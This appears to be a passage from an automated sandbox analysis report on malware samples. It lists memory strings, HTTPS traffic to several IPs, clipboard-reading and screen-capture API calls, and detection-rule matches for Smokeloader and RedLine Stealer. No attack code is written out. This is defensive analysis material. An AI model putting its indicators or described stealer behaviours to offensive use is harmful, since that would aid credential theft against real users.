                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3455841422.0000250454D04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
                          Source: firefox.exe, 0000001D.00000002.3456418120.000028C352713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3422411758.00000214ADC4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bbc.co.uk/
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3456418120.000028C352713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
                          Source: firefox.exe, 0000001D.00000002.3455841422.0000250454D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
                          Source: firefox.exe, 0000001D.00000002.3456418120.000028C352713000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
                          Source: d0d9725343.exe, 0000000B.00000003.2903621269.00000000037FB000.00000004.00000800.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000003.2903742030.00000000037F9000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3106258416.00000000057EC000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3106134459.00000000057EF000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3242225033.000000000541E000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3243660285.000000000541B000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3244478054.000000000541B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: firefox.exe, 0000001D.00000003.3339089600.00000214B3CB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                          Source: firefox.exe, 0000001D.00000002.3442726709.00000214B3C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search
                          Source: firefox.exe, 0000001D.00000002.3414473910.00000214AC811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3260407550.00000214AB431000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3404418065.00000214AB6B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000003.3260074424.00000214AB40F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
                          Source: d0d9725343.exe, 0000000B.00000003.2903621269.00000000037FB000.00000004.00000800.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000003.2903742030.00000000037F9000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3106258416.00000000057EC000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3106134459.00000000057EF000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3242225033.000000000541E000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3243660285.000000000541B000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3244478054.000000000541B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/policies/privacy/
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmpString found in binary or memory: https://www.google.com/policies/privacy/2
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/policies/privacy/resource://gre/modules/GMPInstallManager.sys.mjsList
                          Source: firefox.exe, 0000001D.00000002.3414473910.00000214AC883000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/searchLOAD_ANONYMOUS_ALLOW_CLIENT_CERTctrlTab-showAll-container
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3456418120.000028C352713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3422411758.00000214ADC4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3456418120.000028C352713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3422411758.00000214ADC4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
                          Source: firefox.exe, 0000001D.00000003.3318498425.00000214ABF64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3422411758.00000214ADC4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
                          Source: firefox.exe, 0000001D.00000003.3318498425.00000214ABF64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/loadPath
                          Source: d0d9725343.exe, 0000000B.00000003.2954153518.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3167200926.00000000057D5000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3315639866.0000000005411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
                          Source: d0d9725343.exe, 0000000B.00000003.2954153518.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3167200926.00000000057D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3433552608.00000214AF391000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001D.00000003.3364445219.00000214ADDAE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3454872556.00001A5334604000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3445177283.00000214B3FD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3315185468.00000214AF391000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3394874901.00000214A892D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3374751483.0000006AFD63B000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3354036603.00000214ADDAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                          Source: firefox.exe, 0000001D.00000002.3417855408.00000214ACC43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                          Source: firefox.exe, 0000001D.00000003.3322309310.00000214ACB79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3322309310.00000214ACB93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/How
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/https://www.mozilla.org/about/legal/terms/mozilla/
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/mr2022-background-update-toast-primary-button-labe
                          Source: firefox.exe, 0000001D.00000002.3417855408.00000214ACC43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                          Source: firefox.exe, 0000001D.00000002.3416090218.00000214ACA1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-mod
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/new/
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/new/resource://gre/modules/ObjectUtils.sys.mjsresource://gre/modules
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                          Source: firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
                          Source: firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
                          Source: firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/V
                          Source: firefox.exe, 0000001D.00000002.3374751483.0000006AFD63B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.orgo
                          Source: firefox.exe, 0000001D.00000002.3425023618.00000214AE2C4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3456418120.000028C352713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
                          Source: firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3456418120.000028C352713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3422411758.00000214ADC4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.openh264.org/
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmpString found in binary or memory: https://www.openh264.org//
                          Source: firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3422411758.00000214ADC4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
                          Source: d0d9725343.exe, 0000000B.00000003.3004420814.00000000037B1000.00000004.00000800.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000003.2979921174.00000000037B1000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3168094376.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3380329645.00000214A6DAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3394874901.00000214A892D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                          Source: firefox.exe, 0000001D.00000002.3455841422.0000250454D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tsn.ca
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.widevine.com/
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmpString found in binary or memory: https://www.widevine.com/3
                          Source: firefox.exe, 0000001D.00000002.3456418120.000028C352713000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
                          Source: firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3456418120.000028C352713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
                          Source: firefox.exe, 0000001D.00000002.3442726709.00000214B3C07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001D.00000002.3457171738.00003265CC204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.com
                          Source: firefox.exe, 0000001D.00000002.3442157921.00000214B3B6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3422411758.00000214ADCB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com
                          Source: firefox.exe, 0000001D.00000003.3317888564.00000214ADDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/
                          Source: firefox.exe, 0000001D.00000002.3370890446.0000006AF5BD8000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/accoSt?=https://a
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                          Source: firefox.exe, 0000001B.00000002.3245222022.000002ABFAA6F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3254876412.0000025FAF72F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3377330993.000002149B219000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
                          Source: firefox.exe, 0000001D.00000002.3377330993.000002149B219000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd4u%b
                          Source: firefox.exe, 0000001D.00000002.3378785506.000002149CE6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdOur
                          Source: firefox.exe, 0000001D.00000002.3377330993.000002149B219000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdY
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdhttps://addons.mozil
                          Source: 3981530833.exe, 00000010.00000002.3310836635.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, 3981530833.exe, 00000010.00000003.3288760750.00000000013A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdx
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/accountgWindowsWithUnloadHandlerexperimental.hideHeuristic_getBoundsWithoutFlush
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.6:49867 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.6:49873 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.6:49879 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.6:49884 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.6:49891 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.6:49899 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.6:49905 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49921 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.78:443 -> 192.168.2.6:49924 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49930 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49936 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49943 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49951 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49958 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49960 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49967 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49973 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49979 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49992 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49994 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50013 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50014 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50017 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50033 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50041 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50065 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:50074 version: TLS 1.2
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00431A30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,11_2_00431A30
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00431A30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,11_2_00431A30
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00431BB0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,11_2_00431BB0

                          System Summary

                          barindex
                          Source: 0000000C.00000002.3486058612.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                          Source: 0000000C.00000002.3478917233.0000000000F4D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                          Source: 3981530833.exe, 00000010.00000000.3188474119.0000000000F62000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5e50e9b5-8
                          Source: 3981530833.exe, 00000010.00000000.3188474119.0000000000F62000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating 